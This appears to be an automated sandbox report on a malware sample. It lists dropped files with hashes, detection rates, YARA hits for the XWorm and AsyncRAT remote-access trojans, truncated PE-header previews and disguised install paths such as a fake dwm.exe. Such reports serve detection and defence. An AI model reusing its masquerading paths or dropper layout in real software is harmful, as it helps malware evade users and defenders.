                                                                    Preview:Zx5T9McxHi3X0AsfzStgNKhf2V57SDuyoJBIOM8dQyQ68ujXCquhApWOPaaoRffEyFtq8kRnTQPZ4kgIvh4lTMx8wx2xwULvTMI3B2ZcZHOtZ6Up3R2tk3umRu4Lrd09EeGscnH3IcML7DjzcN3ebcKZbfmR8Nu5QPp50mMQK9lIrjoNLEsejVhmTqQ6Bz44sQ4sYn90AnUb0Cs20YF4ePV5rCmJVQPUFqaao6yhE2e6BGvQ8YFmtAac49BWA0fuX9WKmRN4kizmvZ4lQWL6KnkFQ8go5chOXujBtlnqLLCLKxqfFZFopijuZR3ovj9IBlPBz31osev9lY4cRBjfW2jyKzlcr95lL4KjiopMia5KxjJAWbWuAdvIBa0ARZ6tiJxrNV4nVW756YAlplGQmLlsIChHxo5JdMmnvcwAhtYngzMnZPVpSqHXiFiLywzrbxbuwXzNyGt2x7LT03rhTP0xEOFp3kLu4rLtXb0CZH0M6Pjk4PV4ERXM6ophRJTN487Gwc5YDpHMYo0zofvoPQqmT9wtwTvPxmR8RdycU61ZJLxSxz2wYp8oSUwwqLlt32YvW2hLrSUS
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):847360
                                                                    Entropy (8bit):6.0749660749943555
                                                                    Encrypted:false
                                                                    SSDEEP:12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
                                                                    MD5:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    SHA1:82903E26C42111B5CBC0214BCD710B487B6C4B21
                                                                    SHA-256:0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
                                                                    SHA-512:6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):290
                                                                    Entropy (8bit):5.747291505091143
                                                                    Encrypted:false
                                                                    SSDEEP:6:Rde/risjsfP4Zdl+rVjGB7IMZx1BUAFl1tR1VrODnoZsEn:STisj6wX0NGJDCAttVMsn
                                                                    MD5:1492B001D84151F392B45454EA6658D0
                                                                    SHA1:00F77B8E4F25A28DF82AAC6ECC95CF1DF247A598
                                                                    SHA-256:342936D1841F70102C00324133866F0C1D4EFA3D5BB98810FBD2C1FF4E28EF6C
                                                                    SHA-512:B2E014663288132A27F52D836E6E0992A01C9EB19D3D6FFF55097CE4ACF8CCE5C0F3637330558142A8DA565904ABD589C0B851CC08E6DFA2E4B456602FAC4F04
                                                                    Malicious:false
                                                                    Preview:sbQzsobMzivcQtykDKMTHFsWaH8Gyd8J7AsKA1i4MFB9PNJFdqvUwKKms4YkqUXVjmfPAojMlRHBEsHM72nHsnWw0GbGc8O1rpZms4FzGisfDIiAwLnxrPn6PtY4McunDPUYSeeDxyBJ41srhbTQUaKbCdW9fKmnyFbyyKrSrkA3OeBYAqXvIdTmE2WzHehmLXUzZ43WtBiuZRMhb89yx0fVvzt6y2LNCYr1JM8FxACH4jMxpyXIfsyV29DkK7i00VrBkVXP93BxyXaMm6Q9fCrUkV9KIY40cM
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):847360
                                                                    Entropy (8bit):6.0749660749943555
                                                                    Encrypted:false
                                                                    SSDEEP:12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
                                                                    MD5:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    SHA1:82903E26C42111B5CBC0214BCD710B487B6C4B21
                                                                    SHA-256:0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
                                                                    SHA-512:6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:ASCII text, with very long lines (375), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):375
                                                                    Entropy (8bit):5.780877147142174
                                                                    Encrypted:false
                                                                    SSDEEP:6:Tso8CTSAy1qxCazlIL14T35/BmdqfWEq5XrhLpKnFbKyYvlhXCSU7ktgn:odFAmqQElIREJ2OWN5XVLgFu/aSyktgn
                                                                    MD5:AA0B46909FCEAAE28DC52DEA04174463
                                                                    SHA1:379B503C574DA8E4C84BFCA799A487EA77421D6A
                                                                    SHA-256:35EE43B1EAD9EC43D7FBD49DDA4166CA1EEADE9DFF223F76085DCC060629F468
                                                                    SHA-512:94584876FCDD3312E37DF1F84BF12030DF6709C5862086A6DE27DC83603B572962E430A574938CC8B3B1CC0AADD77719EDB5CF522AB33A31E4FA71BA44507541
                                                                    Malicious:false
                                                                    Preview:tBaiDMdU7A9X7rVzu0G7mS8VJzrokMlxuU8GoZPxvcGUgejry7xYy7uaDFZOeytuYLnntPLVlSLJMozoPA0mZM9wjhDjAAS6sV5U058jvcxfvkOYQu8e8GVMM0DLLmUkAPb0texUCR06ZdA8SpSQBy8l9tHA1wXJHMfgJXov6ocqPZwt0F3gTEjLRz1AWxcP4ryN8ey4AhUXWRWj6YJw20zDnTPUgoZILMwhkjuVQ9gwtLzAdSD7nqXD2ujoPdYVILMKey8Xoxf2UCUbeP1Nlbefytp09FGwlKoh9ofpTqT0KetzaHK9mKuqrrVuIIXirsRJYwcztM44IoUU9zZ25GKbZ70STugLSuIcNjbopVQZPziDWAvTsfn
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):847360
                                                                    Entropy (8bit):6.0749660749943555
                                                                    Encrypted:false
                                                                    SSDEEP:12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
                                                                    MD5:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    SHA1:82903E26C42111B5CBC0214BCD710B487B6C4B21
                                                                    SHA-256:0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
                                                                    SHA-512:6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):1740
                                                                    Entropy (8bit):5.36827240602657
                                                                    Encrypted:false
                                                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
                                                                    MD5:B28E0CCD25623D173B2EB29F3A99B9DD
                                                                    SHA1:070E4C4A7F903505259E41AFDF7873C31F90D591
                                                                    SHA-256:3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
                                                                    SHA-512:17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                    Process:C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):1281
                                                                    Entropy (8bit):5.370111951859942
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                    Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):954
                                                                    Entropy (8bit):5.350970057955659
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KLE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKLHKnYHKh3oPtHo6hAHKzeR
                                                                    MD5:3CE64235B0821B76294C3AD95F117E6C
                                                                    SHA1:FD1EC471493CE132D0D719A9771739912BEF91BF
                                                                    SHA-256:C5348C9009777CDF6C5CBD5D767A400932C0E1FA95F49DF8E797685754790850
                                                                    SHA-512:DA80BE8655187998EB5425EC801E352C386891991A4575811DE365DFD38B1325DE95A540953EC6E9305E74B1A0560968729D742A01198540CFCC166635F104C5
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.IO.Compression.FileSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):64
                                                                    Entropy (8bit):0.34726597513537405
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlll:Nll
                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                    Malicious:false
                                                                    Preview:@...e...........................................................
                                                                    Process:C:\Users\user\Desktop\Vjy8d2EoqK.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):7170862
                                                                    Entropy (8bit):7.992169536232509
                                                                    Encrypted:true
                                                                    SSDEEP:98304:0pzdbM+Q2y+aq02EPzxjOjFgFQlwq4Mjk+dBZtu9xTtwz/aer6/BbiEJ1nL2hBne:0Df07JOjmFQR4MVGFtwLPsnL2hVe
                                                                    MD5:EC729E4911261337E4CA4E9FC77F942B
                                                                    SHA1:1ACAA74A2BCCF387317F940EA7DC3D27AE9924F0
                                                                    SHA-256:AD0FDA5BDC874CBBDDDB9EBB051D4E2B190CA8558438D9E7CCBE5ED5C8249DF3
                                                                    SHA-512:1F2450E10A10A79513D9291E273F922DD60764DDBA15749439AB71DEDE6C5F4E328D0C8F1E96B6245E6B8D02280B9818E368F6FF40C7C491A1DAF64723EEF267
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 39%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d....R.f.........."....(.....l.................@....................................<.n...`.................................................l...x.......\....`..."..~Am..)......h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...\...........................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\XClient.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):123
                                                                    Entropy (8bit):3.7195394315431693
                                                                    Encrypted:false
                                                                    SSDEEP:3:rRSFYJKXzovNsr4rNrN2VjFYJKXzovuEXNrNrN2VjFYJKXzovuEXn:EFYJKDoWrcBKFYJKDoG+BBKFYJKDoG+n
                                                                    MD5:358CA013D20F31391BB744A507ADD2F1
                                                                    SHA1:E59D82B6D42A501549AE0318960BC35ED8F35C18
                                                                    SHA-256:673F4C3E567D54C499CED26C920FAE60B48884BAB9C82E759A41C280BE27DBAB
                                                                    SHA-512:8358B313ACA0A9B8A263ED8364FFDBC97EB966D78EB03E4759B03EA31B564350F00CE5C6232A2B7E69EBC408C1CD36751D52DF912568F1F0EBB6D126535B9076
                                                                    Malicious:false
                                                                    Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r[WIN]....### explorer ###..r[WIN]r[WIN]r[WIN]r[WIN]....### explorer ###..r[WIN]r
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):25
                                                                    Entropy (8bit):4.023465189601647
                                                                    Encrypted:false
                                                                    SSDEEP:3:+sWSOpW6kn:+sVGbk
                                                                    MD5:C8C4BDF458CB1CA0A42DB5ACF23DA34C
                                                                    SHA1:A33B9672A30113D00F760C509197FBD0884F889E
                                                                    SHA-256:55FB2CDA39C14D7946CA55E904388473B3C851004AC7B8E306851EFD22EB7C52
                                                                    SHA-512:5AEA5F57975FA7500397478EA3871C5AADB48B95DE7D8C2F671CB1EB3B3E4880028C074A18048122A1BDA9BE4F633EDDD1804D8F113FACF3E3E385D935E49E8E
                                                                    Malicious:false
                                                                    Preview:fNz1ZzUdQJwUTwq503L3TYwTB
                                                                    Process:C:\Users\user\Desktop\Vjy8d2EoqK.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):77824
                                                                    Entropy (8bit):5.765122972138846
                                                                    Encrypted:false
                                                                    SSDEEP:1536:4BDBCSePghTBz+uO9S+bUwga3HX6l+OZ1aSCEmiEG:4BDcgh1zF+bUiHlOZ1lCEmZG
                                                                    MD5:D69B290766342861CDE3B24BA1ECD0C6
                                                                    SHA1:FB3460CAD777706956AD5FC48FE5CEDA237B68E8
                                                                    SHA-256:4F294703285551743AB59B1092CCC0D7182A6458ACD53ED09CEB06CEACB03622
                                                                    SHA-512:C5ACD87419A6603C470884147186D4D0F5DAA02704731ED42A1B43E44C1F35814178DE614C55DCBF2126F0AC608B13E2F0834F18F537324A256DE10AA8EFF8F5
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\S l r .exe, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\S l r .exe, Author: ditekSHen
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 96%
                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................. .......0....@..............................................@...........................P...............................................................p......................................................CODE................................ ..`DATA....|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.reloc............... ..............@..P.rsrc................"..............@..P.....................$..............@..P........................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\S l r .exe
                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):13312
                                                                    Entropy (8bit):4.677524556734161
                                                                    Encrypted:false
                                                                    SSDEEP:192:konexQO0FoAWyEfJkVIaqaLHmr/XKT0ifnTJ1jvVXctNjA:HnexHAWyEfJoIaqayzKAifd1LVEj
                                                                    MD5:6557BD5240397F026E675AFB78544A26
                                                                    SHA1:839E683BF68703D373B6EAC246F19386BB181713
                                                                    SHA-256:A7FECFC225DFDD4E14DCD4D1B4BA1B9F8E4D1984F1CDD8CDA3A9987E5D53C239
                                                                    SHA-512:F2399D34898A4C0C201372D2DD084EE66A66A1C3EAE949E568421FE7EDADA697468EF81F4FCAB2AFD61EAF97BCB98D6ADE2D97295E2F674E93116D142E892E97
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 33%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............"...0..*...........I... ...`....@.. ....................................`.................................?I..O....`...............................H..8............................................ ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B................sI......H........'... ...........................................................0..;........r...p.(....(...............(...+}......~.......(......9...............(...+}.......}.......6}.......}...... ....}........0..{....+..}......~.......(...........,'.(......r'..p..(....(....(.......s....z..........(...+}.......~.......(....&......%.......%.......%..........+'.(......r=..p..(....(....(.......s....z..*6..(.........*....0...........(....o......rS..p(.........+8...........o..........
                                                                    Process:C:\Users\user\AppData\Local\Temp\S l r .exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):54784
                                                                    Entropy (8bit):5.865893416493186
                                                                    Encrypted:false
                                                                    SSDEEP:1536:ABCSePghTBz+uO9S+bUwga3HX6l+OZ1aSC:Acgh1zF+bUiHlOZ1lC
                                                                    MD5:BF19D4A22F47EEA6DD1DB1C98A5AAC07
                                                                    SHA1:384506BF1E83DF03D48CDC59E7EFB03D8087D3C5
                                                                    SHA-256:A7F98D3361874AC82332FBB9CDED7BE12EF8CB6699305351E27247A2B464272C
                                                                    SHA-512:C8C6FAB16E60FAB5BEB5B209C8FB5446D7E9B46E40EB575D0D8004A634578831DDE56C257B6621E4382C9AB674FDEC005F903DF84A4A4E7A32A952ACE92980AE
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H.f............................>.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H.......<`..........&.....................................................(....*.r...p*. ~.H.*..(....*.ro..p*. .O..*.s.........s.........s.........s.........*.r...p*. h.:.*.r...p*. .x!.*.r...p*. ..[.*.r...p*. ..?.*.r...p*. &...*..((...*.r...p*. .s..*.r7..p*"(....+.*&(....&+.*.+5sZ... .... .'..o[...(,...~....-.(G...(9...~....o\...&.-.*.r...p*. S...*.r9..p*.rW..p*. .(T.*.ru..p*. .._.*.r...p*.r...p*. .0..*..............j..................s]..............~.........*"(I...+.*:.t..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):109392
                                                                    Entropy (8bit):6.641929675972235
                                                                    Encrypted:false
                                                                    SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                                    MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                                    SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                                    SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                                    SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):49424
                                                                    Entropy (8bit):7.810943555944167
                                                                    Encrypted:false
                                                                    SSDEEP:1536:MtiGgF1TxbYecfs2F876zpfImCVQj7SysPxJ:MkHz4LFPNImCVQjGxJ
                                                                    MD5:554B7B0D0DACA993E22B7D31ED498BC2
                                                                    SHA1:EA7F1823E782D08A99B437C665D86FA734FE3FE4
                                                                    SHA-256:1DB14A217C5279C106B9D55F440CCF19F35EF3A580188353B734E3E39099B13F
                                                                    SHA-512:4B36097EDDD2C1D69AC98C7E98EEBE7BB11A5117249AD36A99883732F643E21ECF58E6BEA33B70974D600563DC0B0A30BEAD98BAFB72537F8374B3D67979E60A
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{...............b`.....f......f......f......f......f......0f......b.............0f......0f......0f......0f......Rich............PE..d...0.,d.........." ..."............pd....................................................`.............................................H.................... .. ..................................................pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):59672
                                                                    Entropy (8bit):7.831609372582124
                                                                    Encrypted:false
                                                                    SSDEEP:1536:/UOlRJUIp/i+OnIlnGgm5XVz4iImLPAf7SyNlPx:MOpnomlnGgoXVUiImLPAfPZx
                                                                    MD5:D603C8BFE4CFC71FE5134D64BE2E929B
                                                                    SHA1:FF27EA58F4F5B11B7EAA1C8884EAC658E2E9248B
                                                                    SHA-256:5EE40BCAAB13FA9CF064ECAE6FC0DA6D236120C06FA41602893F1010EFAA52FE
                                                                    SHA-512:FCC0DBFBE402300AE47E1CB2469D1F733A910D573328FE7990D69625E933988ECC21AB22F432945A78995129885F4A9392E1CEE224D14E940338046F61ABE361
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........G..&...&...&...^...&...Z...&...Z...&...Z...&...Z...&..eZ...&...^...&...^...&..cZ...&...&..W&..eZ...&..eZ...&..eZv..&..eZ...&..Rich.&..........PE..d...(.,d.........." ...".........`.......p...................................0............`.........................................H,.......)....... .......................,..........................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                    Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):109328
                                                                    Entropy (8bit):7.929780506017125
                                                                    Encrypted:false
                                                                    SSDEEP:3072:CNb2HcDjyP1iSYsEHOqLQb1H7wtDWPnyTm2GN4ImOqGCArxv:CNb2HeyiOrH0t6r2kC8
                                                                    MD5:9CEF71BE6A40BC2387C383C217D158C7
                                                                    SHA1:DD6BC79D69FC26E003D23B4E683E3FAC21BC29CB
                                                                    SHA-256:677D9993BB887FEF60F6657DE6C239086ACE7725C68853E7636E2FF4A8F0D009
                                                                    SHA-512:90E02054163D44D12C603DEBDC4213C5A862F609617D78DD29F7FD21A0BAE82ADD4CEAF30024DA681C2A65D08A8142C83EB81D8294F1284EDFBEEB7D66C371C8
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
